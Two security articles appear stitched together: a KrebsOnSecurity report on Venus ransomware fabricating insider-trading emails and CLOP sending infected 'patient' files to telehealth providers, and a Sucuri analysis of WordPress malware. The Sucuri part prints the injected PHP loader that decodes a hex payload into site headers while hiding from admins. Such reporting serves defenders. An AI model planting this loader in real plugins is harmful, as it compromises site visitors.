Ransomware groups are constantly devising new methods for infecting victims and convincing them to pay up, but a couple of strategies tested recently seem especially devious. The first centers on targeting healthcare organizations that offer consultations over the Internet and sending them booby-trapped medical records for the “patient.” The other involves carefully editing email inboxes of public company executives to make it appear that some were involved in insider trading.

Alex Holden is founder of Hold Security, a Milwaukee-based cybersecurity firm. Holden’s team gained visibility into discussions among members of two different ransom groups: CLOP (a.k.a. “Cl0p” a.k.a. “TA505“), and a newer ransom group known as Venus.

Last month, the U.S. Department of Health and Human Services (HHS) warned that Venus ransomware attacks were targeting a number of U.S. healthcare organizations. First spotted in mid-August 2022, Venus is known for hacking into victims’ publicly-exposed Remote Desktop services to encrypt Windows devices.

Holden said the internal discussions among the Venus group members indicate this gang has no problem gaining access to victim organizations.

“The Venus group has problems getting paid,” Holden said. “They are targeting a lot of U.S. companies, but nobody wants to pay them.”

Which might explain why their latest scheme centers on trying to frame executives at public companies for insider trading charges. Venus indicated it recently had success with a method that involves carefully editing one or more email inbox files at a victim firm — to insert messages discussing plans to trade large volumes of the company’s stock based on non-public information.

“We imitate correspondence of the [CEO] with a certain insider who shares financial reports of his companies through which your victim allegedly trades in the stock market, which naturally is a criminal offense and — according to US federal laws [includes the possibility of up to] 20 years in prison,” one Venus member wrote to an underling.

“You need to create this file and inject into the machine(s) like this so that metadata would say that they were created on his computer,” they continued. “One of my clients did it, I don’t know how. In addition to pst, you need to decompose several files into different places, so that metadata says the files are native from a certain date and time rather than created yesterday on an unknown machine.”

Holden said it’s not easy to plant emails into an inbox, but it can be done with Microsoft Outlook .pst files, which the attackers may also have access to if they’d already compromised a victim network.

“It’s not going to be forensically solid, but that’s not what they care about,” he said. “It still has the potential to be a huge scandal — at least for a while — when a victim is being threatened with the publication or release of these records.”

The Venus ransom group’s extortion note. Image: Tripwire.com

Holden said the CLOP ransomware gang has a different problem of late: Not enough victims. The intercepted CLOP communication seen by KrebsOnSecurity shows the group bragged about twice having success infiltrating new victims in the healthcare industry by sending them infected files disguised as ultrasound images or other medical documents for a patient seeking a remote consultation.

The CLOP members said one tried-and-true method of infecting healthcare providers involved gathering healthcare insurance and payment data to use in submitting requests for a remote consultation on a patient who has cirrhosis of the liver.

“Basically, they’re counting on doctors or nurses reviewing the patient’s chart and scans just before the appointment,” Holden said. “They initially discussed going in with cardiovascular issues, but decided cirrhosis or fibrosis of the liver would be more likely to be diagnosable remotely from existing test results and scans.”

While CLOP as a money making collective is a fairly young organization, security experts say CLOP members hail from a group of Threat Actors (TA) known as “TA505,” which MITRE’s ATT&CK database says is a financially motivated cybercrime group that has been active since at least 2014. “This group is known for frequently changing malware and driving global trends in criminal malware distribution,” MITRE assessed.

In April, 2021, KrebsOnSecurity detailed how CLOP helped pioneer another innovation aimed at pushing more victims into paying an extortion demand: Emailing the ransomware victim’s customers and partners directly and warning that their data would be leaked to the dark web unless they can convince the victim firm to pay up.

Security firm Tripwire points out that the HHS advisory on Venus says multiple threat actor groups are likely distributing the Venus ransomware. Tripwire’s tips for all organizations on avoiding ransomware attacks include:

• Making secure offsite backups.
• Running up-to-date security solutions and ensuring that your computers are protected with the latest security patches against vulnerabilities.
• Using hard-to-crack unique passwords to protect sensitive data and accounts, as well as enabling multi-factor authentication.
• Encrypting sensitive data wherever possible.
• Continuously educating and informing staff about the risks and methods used by cybercriminals to launch attacks and steal data.

While the above tips are important and useful, one critical area of ransomware preparedness overlooked by too many organizations is the need to develop — and then periodically rehearse — a plan for how everyone in the organization should respond in the event of a ransomware or data ransom incident. Drilling this breach response plan is key because it helps expose weaknesses in those plans that could be exploited by the intruders.

As noted in last year’s story Don’t Wanna Pay Ransom Gangs? Test Your Backups, experts say the biggest reason ransomware targets and/or their insurance providers still pay when they already have reliable backups of their systems and data is that nobody at the victim organization bothered to test in advance how long this data restoration process might take.

“Suddenly the victim notices they have a couple of petabytes of data to restore over the Internet, and they realize that even with their fast connections it’s going to take three months to download all these backup files,” said Fabian Wosar, chief technology officer at Emsisoft. “A lot of IT teams never actually make even a back-of-the-napkin calculation of how long it would take them to restore from a data rate perspective.”

Source: https://krebsonsecurity.com/2022/12/new-ransom-payment-schemes-target-executives-telemedicine/

Attackers are always finding unique ways to avoid detection. Our teams regularly find malware on compromised websites which have been obfuscated to make it more difficult for webmasters to detect or understand. Obfuscation can take many forms, such as encrypting code or using complex algorithms to hide the true nature of the malicious contents. For example, many malware samples we detect are encoded into base64 to confuse website owners and evade detection.

But during a recent investigation, I stumbled across a rather interesting piece of malware using a more complex form of obfuscation. Instead of leveraging the typical base64 encoding to evade detection, the attacker was adding variations of a PHP function to normal plugin files which decoded hex2dec from a second file containing a hexadecimal payload.

Let’s take a closer look.

Unwanted redirects to fake captcha scam

A new client was complaining that whenever a site visitor clicked anywhere on their website, a browser tab was opened which redirected the victim to the following spammy web page: hxxps://1.guesswhatnews[.]com/not-a-robot/index.html

The spam website was resolving to an IP address https://urlscan.io/ip/45.133.44.20 employed by a shady ad network mainly used for porn websites.

An inspection of the compromised web page revealed a malicious JavaScript injection as the source of the redirect, which had been injected into random plugin files on the compromised website.

Malicious JavaScript injected into WordPress plugins via _inc.tmp

As it turns out, our remediation teams have recently noticed an influx of tickets for WordPress websites that have the following code injected into random plugins:

if ((is_admin() || (function_exists('get_hex_cache'))) !== true) {
        add_action('wp_head', 'get_hex_cache', 12);

        function get_hex_cache()
        {
            return print(@hex2bin( '3c7' . (file_get_contents(__DIR__  .'/_inc.tmp'))));
        }
    }

This PHP code injects the decoded contents of _inc.tmp (found in the same plugin directory) into the header section of the site’s WordPress pages.

To accomplish this, it adds the get_hex_cache function to the wp_head hook. This hook is only added once, even when more than one plugin is infected. It’s also worth noting that the malware is not activated for site administrators.

The _inc.tmp file contains a 51Kb-long sequence of digits:

It’s a hexadecimally encoded binary string. The malware appends 3c7 at the beginning of the string and decodes using the hex2bin PHP function.

The decoded results contain a <script> tag populated with obfuscated JavaScript code, which is injected into WordPress pages.

The code begins with “function _0x18b4(){const _0x188f70=”. And yet another interesting feature of this injection is the data-group=”lists” parameter of the script tag. A quick check with PublicWWW revealed over 170 websites infected with this particular piece of malware (at the time of writing).

Furthermore, the script adds a listener to the whole page’s onclick event. Whenever a site visitor clicks on any link, it changes the link to hxxps://1.guesswhatnews[.]com/not-a-robot/index.html?var=siteid&ymid=clickid&rc=0&mrc=3&fsc=0&zoneid=1947429&tbz=1947431

Evading detection from dev tools

To hide the malicious activity from prying eyes, the script doesn’t do anything if it detects open Developer Tools. We’ve seen this behavior quite often in MageCart malware, however this script uses a more complex approach to detecting dev tools which relies on multiple alternative methods.

Here is a list of some of the function names this malware uses to make these checks:

• checkByImageMethod
• checkDevByScreenResize
• detectDevByKeyboard
• checkByFirebugMethod
• checkByProfileMethod

Whenever the malware detects that dev tools are enabled, then the redirect doesn’t occur and malicious behavior is much harder to find upon inspection.

Mitigation Steps

Obfuscation can make it challenging for website owners to detect or pinpoint the source of malicious behavior on their website. Fortunately, a number of free and paid tools exist to help monitor for indicators of compromise.

Let’s take a look at some of the ways you can mitigate risk of infection for your website.

• Scan your website for malware regularly and keep an eye out for infections at both the client and server level.
• Install the latest software updates and patches for your website as soon as they become available. That includes core CMS, plugins, themes, and other extensible components.
• Leverage a web application firewall to virtually patch known vulnerabilities, block bad bots, and mitigate brute force attacks.
• Harden your website by restricting access to admin pages and using strong, unique passwords for all of your website’s accounts.
• Use file integrity monitoring to detect any unexpected changes in your environment.

Source: https://blog.sucuri.net/2022/12/infected-wordpress-plugins-redirect-to-push-notification-scam.html